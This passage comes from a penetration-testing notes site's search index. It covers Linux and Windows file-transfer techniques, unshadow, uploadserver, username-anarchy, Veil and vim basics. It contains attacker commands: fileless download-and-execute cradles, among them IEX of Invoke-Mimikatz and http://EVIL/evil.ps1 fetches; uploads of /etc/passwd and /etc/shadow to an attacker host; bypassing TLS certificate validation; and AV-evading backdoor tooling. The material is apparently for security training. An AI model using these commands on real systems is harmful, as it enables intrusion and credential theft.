                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#fileless-download-with-curl","title":"Fileless Download with cURL","text":"
                        curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#fileless-download-with-wget","title":"Fileless Download with wget","text":"
                        wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#bash-downloads","title":"Bash downloads","text":"

                        On the server side (attacking machine), setup a server by using one of the methodologies applied above.

                        On the client side (victim's machine):

                        # Connecting to the Target Webserver (attacking machine serving the file)\nexec 3<>/dev/tcp/$ip/80\n\n# Requesting the file to the server \necho -e \"GET /file.sh HTTP/1.1\\n\\n\">&3\n\n# Printing the Response\ncat <&3\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#ssh-downloads-and-uploads-scp","title":"SSH downloads and uploads: SCP","text":"

The SSH implementation comes with an SCP utility for remote file transfer that, by default, uses the SSH protocol.

                        Two requirements:

                        • we have ssh user credentials on the remote host
                        • ssh is open on port 22

                        On the server's side (attacker's machine):

                        # Enable the service\nsudo systemctl enable ssh\n\n# Start the server\nsudo systemctl start ssh\n\n# Check if port is listening\nnetstat -lnpt\n

                        From the attacker machine too:

# Download file foobar.txt saved in the victim's machine. Command is run from the attacker machine connecting to the remote host (victim's machine)\nscp username@$IPvictim:foobar.txt /some/local/directory\n\n# Upload file foo.txt saved in the attacker machine into the victim's. Command is run from the attacker machine connecting to the remote host (victim's machine)\nscp foo.txt username@$IPvictim:/some/remote/directory\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#base64","title":"Base64","text":"

                        To avoid firewall protections we can:

                        1. Base64 encode the file:

                        base64 file.php -w 0\n\n# Alternative\ncat file |base64 -w 0;echo\n

                        2. Copy the base64 string, go to the remote host and decode it and pipe to a file:

                        echo -n \"Looooooong-string-encoded-in-base64\" | base64 -d > file.php\n# -n: do not output the trailing newline\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#web-upload","title":"Web upload","text":"

                        We can use uploadserver.

                        # Install\npython3 -m pip install --user uploadserver\n\n# As we will use https, we will create a self-signed certificate. This file should be hosted in a different location from the web server folder\nopenssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'\n\n# Start the web server\npython3 -m uploadserver 443 --server-certificate /location/different/folder/server.pem\n\n# Now from our compromised machine, let's upload the `/etc/passwd` and `/etc/shadow` files.\ncurl -X POST https://$attackerIP/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure\n# We used the option --insecure because we used a self-signed certificate that we trust.\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#backdoors","title":"Backdoors","text":"

                        See reverse shells, bind shells, and web shells.

                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/","title":"Transferring files techniques - Windows","text":"

See different techniques to set up a server on the attacking machine (typically a Kali box).

                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-base64-encode-decode","title":"PowerShell Base64 Encode & Decode","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#upload-from-linux-attacker-to-windows-victim","title":"Upload from linux (attacker) to Windows (victim)","text":"

If we have access to a terminal, we can encode a file to a base64 string, copy its contents from the terminal, and perform the reverse operation, decoding the string back into the original file.

                        # In attacker machine, check SSH Key MD5 Hash\nmd5sum id_rsa\n\n# In attacker machine, encode SSH Key to Base64\ncat id_rsa |base64 -w 0;echo\n\n\n# Copy output and paste it into the Windows PowerShell terminal in the victim's machine\nPS C:\\lala> [IO.File]::WriteAllBytes(\"C:\\Users\\Public\\id_rsa\", [Convert]::FromBase64String(\"LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=\"))\n\n# Confirming the MD5 Hashes Match with  Get-FileHash cmdlet\nPS C:\\lala> Get-FileHash C:\\Users\\Public\\id_rsa -Algorithm md5\n

                        More about the Get-FileHash cmdlet.

                        Windows Command Line utility (cmd.exe) has a maximum string length of 8,191 characters. Also, a web shell may error if you attempt to send extremely large strings.

                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#download-from-windows-victim-to-linux-attacker","title":"Download from Windows (victim) to linux (attacker)","text":"

                        In the victim's machine (windows):

                        # Encode File Using PowerShell\n[Convert]::ToBase64String((Get-Content -path \"C:\\Windows\\system32\\drivers\\etc\\hosts\" -Encoding byte))\n\n\nGet-FileHash \"C:\\Windows\\system32\\drivers\\etc\\hosts\" -Algorithm MD5 | select Hash\n

                        In the attacker's machine (Linux): We copy this content and paste it into our attack host, use the base64 command to decode it, and use the md5sum application to confirm the transfer happened correctly.

                        echo IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXBsZSBIT1NUUyBmaWxlIHVzZWQgYnkgTWljcm9zb2Z0IFRDUC9JUCBmb3IgV2luZG93cy4NCiMNCiMgVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBtYXBwaW5ncyBvZiBJUCBhZGRyZXNzZXMgdG8gaG9zdCBuYW1lcy4gRWFjaA0KIyBlbnRyeSBzaG91bGQgYmUga2VwdCBvbiBhbiBpbmRpdmlkdWFsIGxpbmUuIFRoZSBJUCBhZGRyZXNzIHNob3VsZA0KIyBiZSBwbGFjZWQgaW4gdGhlIGZpcnN0IGNvbHVtbiBmb2xsb3dlZCBieSB0aGUgY29ycmVzcG9uZGluZyBob3N0IG5hbWUuDQojIFRoZSBJUCBhZGRyZXNzIGFuZCB0aGUgaG9zdCBuYW1lIHNob3VsZCBiZSBzZXBhcmF0ZWQgYnkgYXQgbGVhc3Qgb25lDQojIHNwYWNlLg0KIw0KIyBBZGRpdGlvbmFsbHksIGNvbW1lbnRzIChzdWNoIGFzIHRoZXNlKSBtYXkgYmUgaW5zZXJ0ZWQgb24gaW5kaXZpZHVhbA0KIyBsaW5lcyBvciBmb2xsb3dpbmcgdGhlIG1hY2hpbmUgbmFtZSBkZW5vdGVkIGJ5IGEgJyMnIHN5bWJvbC4NCiMNCiMgRm9yIGV4YW1wbGU6DQojDQojICAgICAgMTAyLjU0Ljk0Ljk3ICAgICByaGluby5hY21lLmNvbSAgICAgICAgICAjIHNvdXJjZSBzZXJ2ZXINCiMgICAgICAgMzguMjUuNjMuMTAgICAgIHguYWNtZS5jb20gICAgICAgICAgICAgICMgeCBjbGllbnQgaG9zdA0KDQojIGxvY2FsaG9zdCBuYW1lIHJlc29sdXRpb24gaXMgaGFuZGxlZCB3aXRoaW4gRE5TIGl0c2VsZi4NCiMJMTI3LjAuMC4xICAgICAgIGxvY2FsaG9zdA0KIwk6OjEgICAgICAgICAgICAgbG9jYWxob3N0DQo= | base64 -d > hosts\n\n\nmd5sum hosts \n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#certutil","title":"Certutil","text":"

                        It's possible to download a file with certutil:

                        certutil.exe -urlcache -split -f \"https://download.sysinternals.com/files/PSTools.zip\" pstools.zip\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-systemnetwebclient","title":"PowerShell System.Net.WebClient","text":"

                        PowerShell offers many file transfer options. In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP, HTTPS or FTP.

                        The following table describes WebClient methods for downloading data from a resource:

• OpenRead : Returns the data from a resource as a Stream.
• OpenReadAsync : Returns the data from a resource without blocking the calling thread.
• DownloadData : Downloads data from a resource and returns a Byte array.
• DownloadDataAsync : Downloads data from a resource and returns a Byte array without blocking the calling thread.
• DownloadFile : Downloads data from a resource to a local file.
• DownloadFileAsync : Downloads data from a resource to a local file without blocking the calling thread.
• DownloadString : Downloads a String from a resource and returns a String.
• DownloadStringAsync : Downloads a String from a resource without blocking the calling thread.
","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-downloadstring-fileless-method","title":"PowerShell DownloadFile Method","text":"
                        # Example: (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')\nPS C:\\lala> (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\\Users\\Public\\Downloads\\PowerView.ps1')\n# Net.WebClient: class name\n# DownloadFile: method\n\n\n# Example: (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')\nPS C:\\lala> (New-Object Net.WebClient).DownloadFileAsync('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1', 'PowerViewAsync.ps1')\n# Net.WebClient: class name\n# DownloadFileAsync: method\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-downloadstring-fileless-method_1","title":"PowerShell DownloadString - Fileless Method","text":"

                        PowerShell can also be used to perform fileless attacks. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression cmdlet or the alias IEX.

                        PS C:\\lala> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')\n

                        IEX also accepts pipeline input.

                        PS C:\\lala> (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-invoke-webrequest","title":"PowerShell Invoke-WebRequest","text":"

                        From PowerShell 3.0 onwards, the Invoke-WebRequest cmdlet is also available. This cmdlet gets content from a web page on the internet. We can use the aliases iwr, curl, and wget instead of the Invoke-WebRequest full name.

                        Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1\n# alias: `iwr`, `curl`, and `wget`\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#more-downloading-techniques","title":"More downloading techniques","text":"

                        From Harmj0y:

                        # normal download cradle\nIEX (New-Object Net.Webclient).downloadstring(\"http://EVIL/evil.ps1\")\n\n# PowerShell 3.0+\nIEX (iwr 'http://EVIL/evil.ps1')\n\n# hidden IE com object\n$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r\n\n# Msxml2.XMLHTTP COM object\n$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText\n\n# WinHttp COM object (not proxy aware!)\n$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText\n\n# using bitstransfer- touches disk!\nImport-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\\t;$r=gc $env:temp\\t;rm $env:temp\\t; iex $r\n\n# DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)\n#   code to execute needs to be a base64 encoded string stored in a TXT record\nIEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt \"SERVER\" | Select -Pattern '\"*\"') -split '\"'[0]))))\n\n# from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d\n<#\n<?xml version=\"1.0\"?>\n<command>\n   <a>\n      <execute>Get-Process</execute>\n   </a>\n  </command>\n#>\n$a = New-Object System.Xml.XmlDocument\n$a.Load(\"https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt\")\n$a.command.a.execute | iex\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#bypassing-techniques","title":"Bypassing techniques","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#the-parameter-usebasicparsing","title":"The parameter -UseBasicParsing","text":"

                        There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.

                        Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#ssltls-secure-channel","title":"SSL/TLS secure channel","text":"

                        Another error in PowerShell downloads is related to the SSL/TLS secure channel if the certificate is not trusted. We can bypass that error with the following command:

                        # With this command we get the error Exception calling \"DownloadString\" with \"1\" argument(s): \"The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel.\"\nIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')\n\n##### To bypass it, first run\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-web-uploads","title":"PowerShell Web Uploads","text":"

First, we launch a webserver in our attacker machine. We can use uploadserver.

                        # Install a Configured WebServer with Upload\npip3 install uploadserver\n\n# Run web server\npython3 -m uploadserver\n

                        From the victim's machine (windows), we will upload the file with Invoke-WebRequest:

                        # PowerShell Script to Upload a File to Python Upload Server\nIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')\n\nInvoke-FileUpload -Uri http://$ipServer:8000/upload -File C:\\Windows\\System32\\drivers\\etc\\hosts\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-base64-web-upload","title":"PowerShell Base64 Web Upload","text":"

                        Another way to use PowerShell and base64 encoded files for upload operations is by using Invoke-WebRequest or Invoke-RestMethod together with Netcat.

                        $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\\Windows\\System32\\drivers\\etc\\hosts' -Encoding Byte))\n\nInvoke-WebRequest -Uri http://$ipServer:8000/ -Method POST -Body $b64\n

                        From the attacker machine:

# We catch the base64 data with Netcat and use the base64 application with the decode option to convert the string to the file.\nnc -lvnp 8000\n\necho <base64> | base64 -d > hosts\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#smb-downloads","title":"SMB Downloads","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#simple-smbserver","title":"Simple SMBserver","text":"

                        From attacker machine, we can use smbserver.py:

                        # First, we create an SMB server in our attacker machine (linux) with smbserver from Impacket \n\nsudo impacket-smbserver share -smb2support /tmp/smbshare\n

                        From the windows machine, the victim's, copy the File from the SMB Server

                        copy \\\\$ipServer\\share\\nc.exe\n

If this is blocked by the organization's security policies (unauthenticated guest access disabled), create the SMB server with a username and password.

                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#smbserver-with-authentication","title":"SMBServer with authentication","text":"

                        From attacker machine, we can use smbserver.py:

                        sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test\n

                        From victim's machine, the windows one:

                        # mount the SMB Server with Username and Password\nnet use n: \\\\$ipServer\\share /user:test test\n\n# Copy the file\ncopy n:\\nc.exe\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#smb-uploads","title":"SMB Uploads","text":"

                        Commonly enterprises don't allow the SMB protocol (TCP/445) out of their internal network because this can open them up to potential attacks.

                        An alternative is to run SMB over HTTP with WebDav. WebDAV is an extension of HTTP, the internet protocol that web browsers and web servers use to communicate with each other. The WebDAV protocol enables a webserver to behave like a fileserver, supporting collaborative content authoring. WebDAV can also use HTTPS.

When you access a share this way, Windows will first attempt to connect using the SMB protocol, and if no SMB share is available, it will try to connect using HTTP.

                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#configuring-webdav-server","title":"Configuring WebDav Server","text":"

                        To set up our WebDav server, we need to install two Python modules, wsgidav and cheroot.

                        pip install wsgidav cheroot\n
                        sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous \n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#connect-to-the-server-and-the-share-from-windows","title":"Connect to the server and the share from windows","text":"

                        Now we can attempt to connect to the share using the DavWWWRoot directory.

# DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. \nC:\\lala> dir \\\\$ipServer\\DavWWWRoot\n\n# Upload files using the WebDAV share\ncopy C:\\Users\\john\\Desktop\\SourceCode.zip \\\\$ipServer\\DavWWWRoot\\\n

                        If there are no SMB (TCP/445) restrictions, you can use impacket-smbserver the same way we set it up for download operations.

                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#ftp-downloads","title":"FTP Downloads","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#pyftpdlib-module","title":"pyftpdlib module","text":"

                        Configure an FTP Server in our attack host using Python3 pyftpdlib module:

                        sudo pip3 install pyftpdlib\n

                        Then we can specify port number 21 because, by default, pyftpdlib uses port 2121. Anonymous authentication is enabled by default if we don't set a user and password.

                        sudo python3 -m pyftpdlib --port 21\n

                        We can use the FTP client or PowerShell Net.WebClient to download files from an FTP server.

                        (New-Object Net.WebClient).DownloadFile('ftp://$ipServer/file.txt', 'ftp-file.txt')\n

When we get a shell on a remote machine, we may not have an interactive shell. In that case, we can script the FTP client with a command file. Example:

                        C:\\htb> echo open 192.168.49.128 > ftpcommand.txt\nC:\\htb> echo USER anonymous >> ftpcommand.txt\nC:\\htb> echo binary >> ftpcommand.txt\nC:\\htb> echo GET file.txt >> ftpcommand.txt\nC:\\htb> echo bye >> ftpcommand.txt\nC:\\htb> ftp -v -n -s:ftpcommand.txt\nftp> open 192.168.49.128\nLog in with USER and PASS first.\nftp> USER anonymous\n\nftp> GET file.txt\nftp> bye\n\nC:\\htb>more file.txt\nThis is a test file\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#ftp-uploads","title":"FTP Uploads","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#run-pyftpdlib-a-ftp-server","title":"Run pyftpdlib, a FTP server","text":"

We will use the pyftpdlib module with the --write option to allow clients to upload files to our attack host.

                        sudo python3 -m pyftpdlib --port 21 --write\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-upload-file","title":"PowerShell Upload File","text":"
                        (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\\Windows\\System32\\drivers\\etc\\hosts')\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#create-a-command-file-for-the-ftp-client-to-upload-a-file","title":"Create a Command File for the FTP Client to Upload a File","text":"

                        Example:

                        C:\\htb> echo open 192.168.49.128 > ftpcommand.txt\nC:\\htb> echo USER anonymous >> ftpcommand.txt\nC:\\htb> echo binary >> ftpcommand.txt\nC:\\htb> echo PUT c:\\windows\\system32\\drivers\\etc\\hosts >> ftpcommand.txt\nC:\\htb> echo bye >> ftpcommand.txt\nC:\\htb> ftp -v -n -s:ftpcommand.txt\nftp> open 192.168.49.128\n\nLog in with USER and PASS first.\n\n\nftp> USER anonymous\nftp> PUT c:\\windows\\system32\\drivers\\etc\\hosts\nftp> bye\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"unshadow/","title":"unshadow","text":"

                        unshadow - combines passwd and shadow files

                        ","tags":["bash"]},{"location":"unshadow/#brute-forcing-etcpasswd-and-etcshadow","title":"Brute forcing /etc/passwd and /etc/shadow","text":"

First, save /etc/passwd and /etc/shadow from the victim machine to the attacker machine.

                        Second, use unshadow to put users and passwords in the same file:

                        unshadow passwd shadow > crackme\n# passwd: file saved with /etc/passwd content.\n# shadow: file saved with /etc/shadow content.\n

Third, run John the Ripper or hashcat to crack the hashes.
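A sketch of the cracking step with John the Ripper (the rockyou.txt path is the usual Kali location; adjust as needed):

john --wordlist=/usr/share/wordlists/rockyou.txt crackme\n\n# Show cracked credentials afterwards\njohn --show crackme\n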

                        ","tags":["bash"]},{"location":"uploadserver/","title":"uploadserver","text":"

                        Python's http.server extended to include a file upload page

                        ","tags":["file transfer technique","server"]},{"location":"uploadserver/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/Densaugeo/uploadserver.

                        python3 -m pip install --user uploadserver\n
                        ","tags":["file transfer technique","server"]},{"location":"uploadserver/#basic-usage","title":"Basic usage","text":"
                        python3 -m uploadserver\n

                        Accepts the same options as http.server. After the server starts, the upload page is at /upload. For example, if the server is running at http://localhost:8000/ go to http://localhost:8000/upload .

                        Now supports uploading multiple files at once! Select multiple files in the web page's file selector, or upload with cURL:

                        curl -X POST http://127.0.0.1:8000/upload -F 'files=@multiple-example-1.txt' -F 'files=@multiple-example-2.txt'\n

                        See an example in File Transfer techniques for Linux.

                        ","tags":["file transfer technique","server"]},{"location":"username-anarchy/","title":"Username Anarchy","text":"

                        Ruby-based tool for generating usernames.

                        This is useful for user account/password brute force guessing and username enumeration when usernames are based on the users' names. By attempting a few weak passwords across a large set of user accounts, user account lockout thresholds can be avoided.

                        "},{"location":"username-anarchy/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/urbanadventurer/username-anarchy.

                        git clone https://github.com/urbanadventurer/username-anarchy.git\n
                        "},{"location":"username-anarchy/#basic-usage","title":"Basic usage","text":"
                        cd username-anarchy\n./username-anarchy -i /home/ltnbob/realneames.txt \n
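It can also generate candidates directly from a first and last name passed as arguments; the names and the output shown in the comment are illustrative:

./username-anarchy jane doe > usernames.txt\nhead usernames.txt\n# jane, janedoe, jane.doe, jdoe, j.doe, ...\n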
                        "},{"location":"veil/","title":"veil","text":"","tags":["pentesting","web pentesting"]},{"location":"veil/#installation","title":"Installation","text":"

                        Repository: https://github.com/Veil-Framework/Veil/

                        Quick install for kali:

                        apt update\napt install -y veil\n/usr/share/veil/config/setup.sh --force --silent\n

                        To run veil:

                        veil\n
                        ","tags":["pentesting","web pentesting"]},{"location":"veil/#usage-and-basic-command","title":"Usage and basic command","text":"

                        Tool \"Evasion\" creates undetectable backdoors.

                        \"Ordenance\" is the payload part that we will launch to this backdoor.

                        Reading list:

                        • https://www.zonasystem.com/2020/07/shellter-veil-evasion-evasion-de-antivirus-ocultando-shellcodes-de-binarios.html
• https://www.hackingloops.com/veil-evasion-virustotal/

One nice thing about Veil is that it provides a Metasploit RC file, meaning that in order to launch the multi/handler you just need to run:

                        msfconsole -r path/to/metasploitRCfile\n
                        ","tags":["pentesting","web pentesting"]},{"location":"vim/","title":"Vim - A text editor","text":""},{"location":"vim/#open-a-file","title":"Open a file","text":"

To edit a file:

                        nvim <file>\n

Open a file in recovery mode:

                        nvim -r <file>\n
                        "},{"location":"vim/#go-to-insert-mode","title":"Go to INSERT mode","text":"

To enter INSERT mode, press one of the following keys and start writing:

                        • a : Cursor after the character.
                        • i : Cursor before the character.
                        • A : Cursor at the end of the line.
                        • I : Cursor at the beginning of the line.

                        To get out of INSERT mode, press ESC.

                        "},{"location":"vim/#browsing-the-file-in-cursor-mode","title":"Browsing the file in CURSOR mode","text":"
• 2G : Go to line 2 of the file.
• gg : Go to line 1 of the file.
• G : Go to last line.
• nG : Go to line n.
• 0 : Go to the beginning of the line.
• $ : Go to the end of the line.
                        • "},{"location":"vim/#delete-cut-in-cursor-mode","title":"Delete (cut) in CURSOR mode","text":"

There is no delete in CURSOR mode; what it actually does is CUT the content. There is also no need to enter INSERT mode to remove text. You can delete text in CURSOR mode with these keys:

• x : Cut character.
• dd : Cut full line.
• dw : Cut word.
• d$ : Cut from the cursor position to the end of the line.
• dnw : Cut n words from the cursor position. For instance, \"d3w\" cuts three words.
• dnd : Cut n lines from the cursor position. For instance, \"d4d\" cuts four lines.
• ciw : Cut the word under the cursor (and enter INSERT mode), no matter where in the word the cursor is, and even if the word is inside parentheses or quotes.
• yw : Copy word.
• yy : Copy full line.
• Tip: We can multiply any command to run multiple times by adding a number before it. For example, \"4yw\" would copy 4 words instead of one, and so on.

                            "},{"location":"vim/#select-text","title":"Select text","text":"

                            To select a content in CURSOR mode you need to change to VISUAL mode.

                            • v : Changes from CURSOR mode to VISUAL mode.
• V : Changes from CURSOR mode to VISUAL mode AND selects the line where the cursor was.

                            Being in VISUAL mode you can:

                            • Select lines with cursor position (Up and Down arrows).
                            • w : Select a word.
                            "},{"location":"vim/#replace-in-cursor-mode","title":"Replace in CURSOR mode","text":"
• R : Enters REPLACE mode; the text you type overwrites the existing text.
                            "},{"location":"vim/#copy-in-cursor-mode","title":"Copy in CURSOR mode","text":"

                            To copy into the clip:

                            • y : Copy selected content into the clip.
                            "},{"location":"vim/#paste-in-cursor-mode","title":"Paste in CURSOR mode","text":"

                            Everything you delete goes to the clip. To paste in CURSOR mode, press key:

• p : Paste the clipboard content after the cursor (below the current line if a full line was cut).
• P : Paste the clipboard content before the cursor (above the current line if a full line was cut).
                            "},{"location":"vim/#insert-a-line-in-cursor-mode","title":"Insert a line in CURSOR mode","text":"

                            Press these keys:

• o : Add a line below the cursor and enter INSERT mode.
• O : Add a line above the cursor and enter INSERT mode.
                            "},{"location":"vim/#undo-and-redo-changes-in-cursor-mode","title":"Undo and Redo changes in CURSOR mode","text":"

                            You can do and undo changes from CURSOR mode with these keys:

• u : Undo changes.
• CTRL+r : Redo changes.
                            "},{"location":"vim/#close-a-file","title":"Close a file","text":"

If there were no modifications, close the file without saving:

                            # Press Esc key to enter CURSOR mode.\n:q\n# Hit ENTER\n

If there were modifications but you don't want to save them:

                            # Press Esc key to enter CURSOR mode.\n:q!\n# Hit ENTER\n
                            "},{"location":"vim/#save-a-file","title":"Save a file","text":"

                            To save the file and continue editing:

                            # Press Esc key to enter CURSOR mode.\n:w\n# Hit ENTER\n

                            To save the file and quit the editor:

                            # Press Esc key to enter CURSOR mode.\n:wq!\n# Hit ENTER\n

                            Also, you can:

                            # Press Esc key to enter CURSOR mode.\n:x\n# Hit ENTER\n

                            To save the file with a different name:

                            # Press ESC key to enter CURSOR mode.\n:w <newFileName>\n# Hit ENTER\n
                            "},{"location":"vim/#browsing-activities-in-the-editor","title":"Browsing activities in the editor","text":"

